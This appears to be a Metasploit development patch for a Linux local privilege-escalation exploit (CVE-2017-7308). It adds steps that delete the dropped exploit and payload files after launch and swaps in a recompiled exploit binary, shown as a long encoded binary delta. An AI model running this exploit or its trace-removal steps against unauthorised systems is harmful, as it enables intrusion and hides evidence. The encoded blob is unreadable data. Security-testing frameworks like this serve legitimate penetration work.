@@ -192,5 +190,10 @@ class MetasploitModule < Msf::Exploit::Local print_status 'Launching exploit...' output = cmd_exec "#{executable_path} #{payload_path}" output.each_line { |line| vprint_status line.chomp } + print_status 'Deleting executable...' + rm_f executable_path + Rex.sleep 5 + print_status 'Deleting payload...' + rm_f payload_path end end From 4322e56c71b79090dda6c2cd4b272383c07d8262 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Thu, 17 May 2018 09:43:07 +0000 Subject: [PATCH 5/6] Recompile pre-compiled exploit executable (stripped, no DEBUG) --- data/exploits/cve-2017-7308/exploit | Bin 72880 -> 55416 bytes 1 file changed, 0 insertions(+), 0 deletions(-) 
diff --git a/data/exploits/cve-2017-7308/exploit b/data/exploits/cve-2017-7308/exploit index 02813270d85a92dc11784943c1a95449c8f468b3..d23d5d9a501c1eef32127a0acc1cfa597449621b 100644 GIT binary patch delta 10111 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 Km_}@r0{uVFvtii) delta 30132 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 